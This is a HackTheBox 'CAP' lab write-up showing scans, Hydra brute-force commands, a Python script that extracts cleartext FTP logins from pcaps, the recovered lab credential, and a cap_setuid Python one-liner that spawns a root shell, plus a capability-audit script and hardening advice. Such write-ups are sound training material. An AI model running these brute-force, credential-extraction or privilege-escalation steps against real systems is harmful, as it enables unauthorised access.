CAP 10.10.10.245

Background

CAP is a Linux machine from HackTheBox. It rewards patient web enumeration and a privilege escalation through Linux file capabilities (cap_setuid set on the Python binary) rather than a SUID bit.
A "security dashboard" website that stores users' network captures was deployed. One of the stored captures contained an FTP session in which the login id and password were sent in cleartext. Because the same password was reused for the system account, the credential also gave SSH access to the target.
After the initial access, LinPEAS was run to look for privilege escalation paths; it showed that the "Capabilities" set on the Python binary were the route to root.
Target Machine: 10.10.10.245
Attacker Machine: 10.10.14.3

Hacking Process Part 0 – Service Scanning

Nmap

1) nmap -p- -T5 --min-rate=1000 10.10.10.245 -oG fkclai.nmap
2) nmap -p $(grep -Eo '[0-9]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV 10.10.10.245 -o nmap-result.txt
# Nmap 7.80 scan initiated Thu Sep 2 22:52:29 2021 as: nmap -p 21,22,80, -sC -sV -o nmap-result.txt 10.10.10.245
Nmap scan report for 10.10.10.245
Host is up (0.35s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http gunicorn
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 NOT FOUND
| Server: gunicorn
| Date: Thu, 02 Sep 2021 14:58:29 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 232
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GetRequest:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Thu, 02 Sep 2021 14:58:21 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 19386
| <!DOCTYPE html>
| <html class="no-js" lang="en">
| <head>
| <meta charset="utf-8">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>Security Dashboard</title>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
| <link rel="stylesheet" href="/static/css/bootstrap.min.css">
| <link rel="stylesheet" href="/static/css/font-awesome.min.css">
| <link rel="stylesheet" href="/static/css/themify-icons.css">
| <link rel="stylesheet" href="/static/css/metisMenu.css">
| <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
| <link rel="stylesheet" href="/static/css/slicknav.min.css">
| <!-- amchar
| HTTPOptions:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Thu, 02 Sep 2021 14:58:22 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Allow: OPTIONS, GET, HEAD
| Content-Length: 0
| RTSPRequest:
| HTTP/1.1 400 Bad Request
| Connection: close
| Content-Type: text/html
| Content-Length: 196
| <html>
| <head>
| <title>Bad Request</title>
| </head>
| <body>
| <h1><p>Bad Request</p></h1>
| Invalid HTTP Version &#x27;Invalid HTTP Version: &#x27;RTSP/1.0&#x27;&#x27;
| </body>
|_ </html>
|_http-server-header: gunicorn
|_http-title: Security Dashboard
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.80%I=7%D=9/2%Time=6130E536%P=x86_64-pc-linux-gnu%r(GetRe
SF:quest,2FE5,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\x20T
SF:hu,\x2002\x20Sep\x202021\x2014:58:21\x20GMT\r\nConnection:\x20close\r\n
SF:Content-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x201938
SF:6\r\n\r\n<!DOCTYPE\x20html>\n<html\x20class=\"no-js\"\x20lang=\"en\">\n
SF:\n<head>\n\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20
SF:<meta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\x20\x
SF:20\x20\x20<title>Security\x20Dashboard</title>\n\x20\x20\x20\x20<meta\x
SF:20name=\"viewport\"\x20content=\"width=device-width,\x20initial-scale=1
SF:\">\n\x20\x20\x20\x20<link\x20rel=\"shortcut\x20icon\"\x20type=\"image/
SF:png\"\x20href=\"/static/images/icon/favicon\.ico\">\n\x20\x20\x20\x20<l
SF:ink\x20rel=\"stylesheet\"\x20href=\"/static/css/bootstrap\.min\.css\">\
SF:n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/static/css/font
SF:-awesome\.min\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20h
SF:ref=\"/static/css/themify-icons\.css\">\n\x20\x20\x20\x20<link\x20rel=\
SF:"stylesheet\"\x20href=\"/static/css/metisMenu\.css\">\n\x20\x20\x20\x20
SF:<link\x20rel=\"stylesheet\"\x20href=\"/static/css/owl\.carousel\.min\.c
SF:ss\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/static/cs
SF:s/slicknav\.min\.css\">\n\x20\x20\x20\x20<!--\x20amchar")%r(HTTPOptions
SF:,B3,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\x20Thu,\x20
SF:02\x20Sep\x202021\x2014:58:22\x20GMT\r\nConnection:\x20close\r\nContent
SF:-Type:\x20text/html;\x20charset=utf-8\r\nAllow:\x20OPTIONS,\x20GET,\x20
SF:HEAD\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,121,"HTTP/1\.1\x20
SF:400\x20Bad\x20Request\r\nConnection:\x20close\r\nContent-Type:\x20text/
SF:html\r\nContent-Length:\x20196\r\n\r\n<html>\n\x20\x20<head>\n\x20\x20\
SF:x20\x20<title>Bad\x20Request</title>\n\x20\x20</head>\n\x20\x20<body>\n
SF:\x20\x20\x20\x20<h1><p>Bad\x20Request</p></h1>\n\x20\x20\x20\x20Invalid
SF:\x20HTTP\x20Version\x20&#x27;Invalid\x20HTTP\x20Version:\x20&#x27;RTSP/
SF:1\.0&#x27;&#x27;\n\x20\x20</body>\n</html>\n")%r(FourOhFourRequest,189,
SF:"HTTP/1\.0\x20404\x20NOT\x20FOUND\r\nServer:\x20gunicorn\r\nDate:\x20Th
SF:u,\x2002\x20Sep\x202021\x2014:58:29\x20GMT\r\nConnection:\x20close\r\nC
SF:ontent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20232\r
SF:\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x203\.2\x20F
SF:inal//EN\">\n<title>404\x20Not\x20Found</title>\n<h1>Not\x20Found</h1>\
SF:n<p>The\x20requested\x20URL\x20was\x20not\x20found\x20on\x20the\x20serv
SF:er\.\x20If\x20you\x20entered\x20the\x20URL\x20manually\x20please\x20che
SF:ck\x20your\x20spelling\x20and\x20try\x20again\.</p>\n");
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Sep 2 22:55:03 2021 -- 1 IP address (1 host up) scanned in 154.69 seconds

Enumeration strategies

Nmap shows vsftpd 3.0.3, OpenSSH 8.2p1 and an HTTP service that answers as gunicorn with no version string. None of these has a known remotely exploitable vulnerability in the reported version, so the remaining work is enumeration on two fronts: 1) FTP/SSH 2) the web application.

Hacking Process Part 1 – Enumeration

FTP/SSH enumeration: the default scripts printed no ftp-anon result, so anonymous FTP is not allowed, and with no known usernames the only thing left to try was a password brute-force against FTP and SSH. The result was negative. That is the expected outcome: root is rarely a valid FTP login and is refused by sshd's default PermitRootLogin setting, and a full rockyou run over SSH is slow and noisy, so on a real engagement it is a last resort rather than a first step.
ftp 21
hydra -l root -P /usr/share/wordlists/rockyou.txt ftp://10.10.10.245

ssh 22
hydra -l root -P /usr/share/wordlists/rockyou.txt 10.10.10.245 -t 4 ssh
Web enumeration 1) Searching for hidden directories
dirb http://10.10.10.245/ /usr/share/wordlists/dirb/common.txt -o dirb-245.result

gobuster dir -u 'http://10.10.10.245/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster-245.result
Directory enumeration found a data directory, and beneath it a list of numbered entries.
2) Browsing the website
The site offered a download link pointing to a pcap file; the first capture was downloaded from http://cap.htb/data/18. Reading it produced nothing useful. Working through the other numbered entries found during directory enumeration, however, turned up a capture containing an FTP login, and that is where the credential used below came from.
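Pulling the FTP login out of a capture is the whole foothold, so here is what that extraction looks like done by hand. This is an added example, not code from the write-up or from the box: it constructs a small pcap in memory (the sample uses the attacker and target addresses from this page and the password recovered below as constructed input; the real capture is not reproduced) and then parses it with the standard library only, walking pcap record -> Ethernet -> IPv4 -> TCP and reporting USER/PASS commands sent to port 21. Point extract_ftp_logins() at the bytes of a downloaded capture to do the same for a real file.

```python
"""Pull cleartext FTP logins out of a classic pcap without Wireshark.

Added example (not from the original write-up). Builds a tiny pcap in memory
from constructed frames, then walks it: pcap record -> Ethernet -> IPv4 -> TCP
-> payload, and reports USER/PASS commands sent to port 21.
"""
import struct

PCAP_MAGIC = 0xA1B2C3D4        # little-endian, microsecond timestamps
LINKTYPE_ETHERNET = 1
ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6
FTP_PORT = 21


def build_frame(src_ip, dst_ip, sport, dport, payload):
    """Construct one Ethernet/IPv4/TCP frame (checksums left at 0; the parser ignores them)."""
    eth = b"\x00" * 12 + struct.pack("!H", ETHERTYPE_IPV4)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 0xFFFF, 0, 0)
    total = 20 + len(tcp) + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total, 0, 0, 64, IPPROTO_TCP, 0,
                     bytes(map(int, src_ip.split("."))), bytes(map(int, dst_ip.split("."))))
    return eth + ip + tcp + payload


def build_pcap(frames):
    """Wrap frames in a libpcap file: 24-byte global header + 16-byte record headers."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1600000000 + i, 0, len(frame), len(frame)) + frame
    return out


def iter_records(data):
    """Yield raw frames from a pcap byte string, honouring the byte order the magic implies."""
    magic = struct.unpack("<I", data[:4])[0]
    if magic == PCAP_MAGIC:
        end = "<"
    elif magic == 0xD4C3B2A1:
        end = ">"
    else:
        raise ValueError("not a classic pcap (pcapng is not handled here)")
    if struct.unpack(end + "I", data[20:24])[0] != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet link type is handled here")
    off = 24
    while off + 16 <= len(data):
        _, _, incl_len, _ = struct.unpack(end + "IIII", data[off:off + 16])
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def tcp_payload(frame):
    """Return (src_ip, dst_ip, sport, dport, payload) for an IPv4/TCP frame, else None."""
    if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != IPPROTO_TCP:
        return None
    total_len = struct.unpack("!H", ip[2:4])[0]
    src = ".".join(map(str, ip[12:16]))
    dst = ".".join(map(str, ip[16:20]))
    tcp = ip[ihl:total_len]            # IP total length drops any Ethernet padding
    if len(tcp) < 20:
        return None
    sport, dport = struct.unpack("!HH", tcp[:4])
    doff = (tcp[12] >> 4) * 4
    return src, dst, sport, dport, tcp[doff:]


def extract_ftp_logins(pcap_bytes):
    """Return [(client, server, user, password)] for every USER/PASS pair sent to port 21."""
    pending = {}                       # (client, server, sport) -> username awaiting its PASS
    logins = []
    for frame in iter_records(pcap_bytes):
        parsed = tcp_payload(frame)
        if parsed is None:
            continue
        src, dst, sport, dport, payload = parsed
        if dport != FTP_PORT or not payload:
            continue
        key = (src, dst, sport)
        for line in payload.decode("latin-1").split("\r\n"):
            verb, _, arg = line.partition(" ")
            if verb.upper() == "USER":
                pending[key] = arg
            elif verb.upper() == "PASS" and key in pending:
                logins.append((src, dst, pending.pop(key), arg))
    return logins


# Constructed sample capture: one FTP login from the attacker address to the target.
SAMPLE_PCAP = build_pcap([
    build_frame("10.10.14.3", "10.10.10.245", 54321, 21, b"USER nathan\r\n"),
    build_frame("10.10.10.245", "10.10.14.3", 21, 54321, b"331 Please specify the password.\r\n"),
    build_frame("10.10.14.3", "10.10.10.245", 54321, 21, b"PASS Buck3tH4TF0RM3!\r\n"),
    build_frame("10.10.14.3", "10.10.10.245", 54321, 21, b"SYST\r\n"),
])

if __name__ == "__main__":
    for client, server, user, password in extract_ftp_logins(SAMPLE_PCAP):
        print(f"{client} -> {server}:21  {user}:{password}")
```

The parser keys pending USER commands by (client, server, source port), so interleaved sessions in one capture do not get their passwords mixed up; server replies are skipped because only traffic to port 21 is inspected.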

Hacking Process Part 2 – Gaining Foothold

Using the credential recovered from the pcap, it was possible to ssh to the target and read user.txt: the FTP password is reused for the system account.
nathan:Buck3tH4TF0RM3!
After the initial access, the next step is to upload linpeas.sh and run it to look for privilege escalation paths.

Hacking Process Part 3 – Privilege Escalation

Because the machine is called "CAP", the LinPEAS finding on Linux capabilities stood out. LinPEAS lists file capabilities, which is what getcap -r / 2>/dev/null prints. When a binary carries CAP_SETUID in its effective and permitted sets (cap_setuid+ep), any user who can execute it can change the process UID to 0 and start a shell as root; that is also why attackers plant this capability on an interpreter as a persistence backdoor.
Of the articles I read, the one by Raj Chandel gave the clearest walkthrough. The first two commands below are his lab setup that reproduces the misconfiguration (they need root, so they are not run on the target); only the last line is the actual escalation, run against the Python binary that already had the capability.
# Lab reproduction of the misconfiguration (Raj Chandel's setup); needs root and is not run on the target
cp $(which python) .
sudo setcap cap_setuid+ep python

# On the target: run the interpreter that getcap/LinPEAS reported as cap_setuid+ep
./python -c 'import os; os.setuid(0); os.system("/bin/sh")'
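To check a host for this class of misconfiguration without LinPEAS, and to read the capability masks a process reports about itself, the following added example (mine, not the write-up's or Raj Chandel's) parses getcap -r output in both layouts libcap has used and decodes /proc/<pid>/status CapEff values. The getcap lines in it, including /opt/tool, are constructed samples, and the DANGEROUS set is my own selection.

```python
"""Triage Linux file capabilities for root-equivalent primitives.

Added example, not part of the original write-up. Parses the text that
`getcap -r / 2>/dev/null` prints (older "path = caps" and newer "path caps"
layouts of libcap) and decodes CapEff/CapPrm hex masks from /proc/<pid>/status.
The getcap lines and masks used below are constructed samples.
"""
import re

# Bit numbers from <linux/capability.h> (Linux 5.8+ defines 0..40).
CAP_NAMES = {
    0: "cap_chown", 1: "cap_dac_override", 2: "cap_dac_read_search",
    3: "cap_fowner", 4: "cap_fsetid", 5: "cap_kill", 6: "cap_setgid",
    7: "cap_setuid", 8: "cap_setpcap", 9: "cap_linux_immutable",
    10: "cap_net_bind_service", 11: "cap_net_broadcast", 12: "cap_net_admin",
    13: "cap_net_raw", 14: "cap_ipc_lock", 15: "cap_ipc_owner",
    16: "cap_sys_module", 17: "cap_sys_rawio", 18: "cap_sys_chroot",
    19: "cap_sys_ptrace", 20: "cap_sys_pacct", 21: "cap_sys_admin",
    22: "cap_sys_boot", 23: "cap_sys_nice", 24: "cap_sys_resource",
    25: "cap_sys_time", 26: "cap_sys_tty_config", 27: "cap_mknod",
    28: "cap_lease", 29: "cap_audit_write", 30: "cap_audit_control",
    31: "cap_setfcap", 32: "cap_mac_override", 33: "cap_mac_admin",
    34: "cap_syslog", 35: "cap_wake_alarm", 36: "cap_block_suspend",
    37: "cap_audit_read", 38: "cap_perfmon", 39: "cap_bpf",
    40: "cap_checkpoint_restore",
}

# Capabilities that hand an unprivileged caller root, or read/write of any file,
# on their own. This is the example's own selection; adjust to your threat model.
DANGEROUS = {
    "cap_setuid", "cap_setgid", "cap_setfcap", "cap_dac_override",
    "cap_dac_read_search", "cap_chown", "cap_fowner", "cap_sys_admin",
    "cap_sys_ptrace", "cap_sys_module", "cap_sys_rawio",
}

# One libcap text clause: "cap_a,cap_b+ep", "cap_net_raw=p", or "=ep" (all caps).
CLAUSE = re.compile(r"^(?P<caps>[a-z0-9_,]*)(?P<op>[+=-])(?P<flags>[eip]*)$")


def parse_cap_text(text):
    """Parse libcap's textual form into {cap_name: flags}, e.g. {"cap_setuid": "ep"}."""
    caps = {}
    for clause in text.split():
        m = CLAUSE.match(clause)
        if not m:
            raise ValueError(f"unrecognised capability clause: {clause!r}")
        names = [n for n in m["caps"].split(",") if n] or list(CAP_NAMES.values())
        for name in names:
            flags = set(caps.get(name, ""))
            if m["op"] == "=":          # '=' replaces the flag set for these caps
                flags = set(m["flags"])
            elif m["op"] == "+":
                flags |= set(m["flags"])
            else:
                flags -= set(m["flags"])
            caps[name] = "".join(sorted(flags))
    return caps


def parse_getcap_line(line):
    """Split one getcap line into (path, {cap: flags}); handles both libcap layouts."""
    line = line.strip()
    if " = " in line:                   # libcap <= 2.40: "/usr/bin/x = cap_setuid+ep"
        path, text = line.split(" = ", 1)
    else:                               # libcap >= 2.41: "/usr/bin/x cap_setuid=ep"
        path, text = line.split(None, 1)
    return path, parse_cap_text(text)


def audit_getcap(output):
    """Return [(path, cap, flags, effective)] for every dangerous file capability.

    effective=False means the cap is only Permitted (+p): the program has to raise
    it with capset()/prctl() before it works, so a stock interpreter will not
    escalate without extra work, but it is still a finding worth fixing.
    """
    findings = []
    for line in output.splitlines():
        if not line.strip():
            continue
        path, caps = parse_getcap_line(line)
        for cap, flags in caps.items():
            if cap in DANGEROUS and "p" in flags:
                findings.append((path, cap, flags, "e" in flags))
    return findings


def decode_capmask(hexmask):
    """Decode a CapEff/CapPrm/CapBnd value from /proc/<pid>/status into cap names."""
    value = int(hexmask, 16)
    return {name for bit, name in CAP_NAMES.items() if value >> bit & 1}


# Constructed sample of `getcap -r /` output. Only python3.8 and /opt/tool are
# findings; the others are the usual benign network helpers.
GETCAP_SAMPLE = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/opt/tool cap_dac_read_search=p
"""

if __name__ == "__main__":
    for path, cap, flags, effective in audit_getcap(GETCAP_SAMPLE):
        note = "" if effective else "  (permitted only: needs capset() first)"
        print(f"{path}: {cap}+{flags}{note}")
    # A process's own view, e.g. "CapEff: 0000000000000080" in /proc/self/status
    print(sorted(decode_capmask("0000000000000080")))
```

Feed audit_getcap() the real output of getcap -r / 2>/dev/null on a host; anything it returns for a general-purpose interpreter or shell is a direct root path and should be cleared with setcap -r. decode_capmask() is useful after the escalation too: a shell whose CapEff decodes to the full set confirms you really are unrestricted root rather than uid 0 inside a capability-bounded container.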

Conclusion

FTP is an insecure protocol that transfers credentials and data in plaintext; a single captured session gave away a valid password, and because that password was reused for the system account it also opened SSH. That is the critical point in gaining the foothold. The second weakness is not that nathan may run Python as root: the Python binary itself carried the cap_setuid file capability, so any local user able to execute it can call setuid(0) and become root.
System administrators should avoid cleartext services where a secure alternative exists, never grant cap_setuid, cap_setgid, cap_dac_override, cap_sys_admin or similar capabilities to general-purpose interpreters, and audit file capabilities regularly with getcap -r /, removing unwanted ones with setcap -r. Such a capability lets a process bypass the kernel's permission checks, which is a direct path to privilege escalation.

Reference